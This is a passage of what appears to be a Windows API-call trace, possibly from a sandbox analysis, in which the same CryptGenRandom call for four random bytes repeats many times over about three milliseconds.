CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 